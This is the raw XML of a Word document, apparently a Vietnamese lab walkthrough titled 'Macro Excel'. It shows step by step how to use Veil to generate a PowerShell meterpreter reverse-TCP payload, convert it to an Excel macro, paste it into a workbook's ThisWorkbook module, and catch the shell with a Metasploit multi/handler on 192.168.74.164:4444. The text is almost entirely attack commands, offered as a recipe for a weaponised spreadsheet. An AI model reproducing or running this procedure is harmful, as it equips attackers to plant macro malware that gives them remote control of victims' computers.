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F4E21" w14:textId="71716F63" w:rsidR="002E2052" w:rsidRDefault="005B7958">
      <w:r>
        <w:t>Macro Excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB2FC3" w14:textId="0F7D9B9A" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58419D2C" wp14:editId="10470453">
            <wp:extent cx="5943600" cy="4895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64E" w14:textId="24BC41BA" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mở</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532397C" w14:textId="2C3F826B" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lệnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B0CD4" w14:textId="70EA7EB6" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04D2902C" wp14:editId="678B9546">
            <wp:extent cx="5943600" cy="435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59D" w14:textId="3782F3C1" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:r>
        <w:t>use 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A0896" w14:textId="202E1B36" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="592D65BC" wp14:editId="779EBFB9">
            <wp:extent cx="5943600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BF6" w14:textId="0EB837CC" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:r>
        <w:t>list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34104E86" w14:textId="34B58D7B" w:rsidR="005B7958" w:rsidRDefault="005B7958">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0763AE03" wp14:editId="1BF8D950">
            <wp:extent cx="5700254" cy="5700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8319" w14:textId="7863C3B2" w:rsidR="005B7958" w:rsidRDefault="000B7975">
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="005B7958">
        <w:t>se 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B6742D" w14:textId="77777777" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rev_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;]: set LHOST 192.168.74.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657831E" w14:textId="7A958D5A" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rev_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;]: generate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565CB406" w14:textId="764EB080" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C377CE" wp14:editId="42EF6DA8">
            <wp:extent cx="5943600" cy="368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2F9" w14:textId="0FE99005" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD110A2" wp14:editId="5892B9AA">
            <wp:extent cx="5943600" cy="3152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BA74" w14:textId="12EB5F15" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:t xml:space="preserve">Copy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 .bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB585B" w14:textId="21C49784" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D475FD" wp14:editId="32DB4A77">
            <wp:extent cx="5943600" cy="1767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618" w14:textId="326E5683" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:t xml:space="preserve">Convert sang macro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payload 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF9BE39" w14:textId="4F5056DE" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:t>use 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58216973" w14:textId="38317B2D" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70AEE51E" wp14:editId="7B3B978A">
            <wp:extent cx="4877223" cy="23319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7D70" w14:textId="77777777" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auxuliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>macro_converter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;]: set ARCHITECTURE x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F3DE5" w14:textId="24920259" w:rsidR="000B7975" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auxuliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>macro_converter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;]: set POSH_BATCH /var/lib/veil/output/source/a.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1070E202" w14:textId="6B722B7C" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269B12B5" wp14:editId="330BEC3A">
            <wp:extent cx="59436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19A7" w14:textId="63A62EAB" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7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79593893" w14:textId="3C1FCF05" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7042AB" wp14:editId="438E109A">
            <wp:extent cx="5943600" cy="1086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BBF3" w14:textId="2F318467" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19B12236" wp14:editId="3D47E4B1">
            <wp:extent cx="5943600" cy="257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BC56" w14:textId="73ADEE9B" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:t xml:space="preserve">Copy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b.txt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</w:p>
    <w:p w14:paraId="72A7ADBC" w14:textId="4CC00871" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r w:rsidRPr="00BE65D7">
        <w:t>cp /var/lib/veil/output/source/b.txt /root/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10A56C" w14:textId="39ECF5C8" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A05C0E6" wp14:editId="18DB8E40">
            <wp:extent cx="5044877" cy="110499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CE7" w14:textId="63E8B7D9" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EECD20E" wp14:editId="15F7F117">
            <wp:extent cx="4900085" cy="50677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E62" w14:textId="3E1E409B" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mở</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> developer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>của</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A161DC" w14:textId="58A459AE" w:rsidR="00BE65D7" w:rsidRDefault="009E7A72" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61A4BBBA" wp14:editId="4247D432">
            <wp:extent cx="594360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80C" w14:textId="0EE02A26" w:rsidR="009E7A72" w:rsidRDefault="009E7A72" w:rsidP="00BE65D7">
      <w:r>
        <w:t xml:space="preserve">Copy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thisWorkbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48BD9DFD" w14:textId="457E69C6" w:rsidR="009E7A72" w:rsidRDefault="009E7A72" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F2E6DE" wp14:editId="28865BD9">
            <wp:extent cx="5943600" cy="2759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B7E2" w14:textId="2AE0063F" w:rsidR="009E7A72" w:rsidRDefault="009E7A72" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060B207E" wp14:editId="251828C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7713" w14:textId="197C0732" w:rsidR="009E7A72" w:rsidRDefault="009E7A72" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ACB6F04" wp14:editId="74D48EED">
            <wp:extent cx="5943600" cy="155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E9F" w14:textId="503C745F" w:rsidR="009E7A72" w:rsidRDefault="009E7A72" w:rsidP="00BE65D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7421B933" wp14:editId="40B73A18">
            <wp:extent cx="5943600" cy="4596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B8E" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t xml:space="preserve">msf6 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33939D05" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t>[*] Using configured payload generic/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40FB98C4" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; set payload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</w:p>
    <w:p w14:paraId="0F2069C7" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t>payload =&gt;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</w:p>
    <w:p w14:paraId="6986B136" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.74.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F494E1D" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =&gt; 192.168.74.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46A525" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A6AF6" w14:textId="77777777" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D506FE2" w14:textId="4BF79D3A" w:rsidR="009E7A72" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7557A2F8" w14:textId="6C3FA8DC" w:rsidR="009409F1" w:rsidRDefault="009409F1" w:rsidP="009409F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7869FFC6" wp14:editId="77896048">
            <wp:extent cx="5943600" cy="5164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FC1" w14:textId="0BF6B699" w:rsidR="009409F1" w:rsidRDefault="00FC76B0" w:rsidP="009409F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Excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7B924" w14:textId="4CF21DB6" w:rsidR="00FC76B0" w:rsidRDefault="00FC76B0" w:rsidP="009409F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A27EEDF" wp14:editId="07F49483">
            <wp:extent cx="5075360" cy="467908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AAD3" w14:textId="77777777" w:rsidR="00FC76B0" w:rsidRDefault="00FC76B0" w:rsidP="009409F1"/>
    <w:p w14:paraId="59F0D965" w14:textId="77777777" w:rsidR="00BE65D7" w:rsidRDefault="00BE65D7" w:rsidP="00BE65D7"/>
    <w:p w14:paraId="089CAFD9" w14:textId="77777777" w:rsidR="000B7975" w:rsidRDefault="000B7975" w:rsidP="000B7975"/>
    <w:sectPr w:rsidR="000B7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E6"/>
    <w:rsid w:val="000B7975"/>
    <w:rsid w:val="002E2052"/>
    <w:rsid w:val="005B7958"/>
    <w:rsid w:val="009409F1"/>
    <w:rsid w:val="009E7A72"/>
    <w:rsid w:val="00BE65D7"/>
    <w:rsid w:val="00E465E6"/>
    <w:rsid w:val="00FC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7E67A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{483F6AC6-A3C0-4025-8714-DBAD7A91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customXml" Target="../customXml/item3.xml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3A3DB0F3B7DF4EA87E9071408B0D6E" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="0d59c8b9a4869882f0a17e4d27bde702">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="b702ecc2-b28e-4466-8985-05390c27eb6b" xmlns:ns3="00d187dc-8039-4c02-83bd-0959fd86527f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1433c508db4dca68b9a007fa2b17bacb" ns2:_="" ns3:_="">
    <xsd:import namespace="b702ecc2-b28e-4466-8985-05390c27eb6b"/>
    <xsd:import namespace="00d187dc-8039-4c02-83bd-0959fd8652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02ecc2-b28e-4466-8985-05390c27e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d187dc-8039-4c02-83bd-0959fd8652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A718DC-5F7E-484B-B4E0-A9A72C58AB27}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D21A3DB7-34A4-4496-922E-DC782FE7AFE9}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BD0F158F-01F7-42B1-85FC-781378801CB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Ngoc Hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Trinh Ngoc Hung</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-04T06:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-04T07:16:00Z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0x010100C83A3DB0F3B7DF4EA87E9071408B0D6E</vt:lpwstr>
  </property>
</Properties>
</file>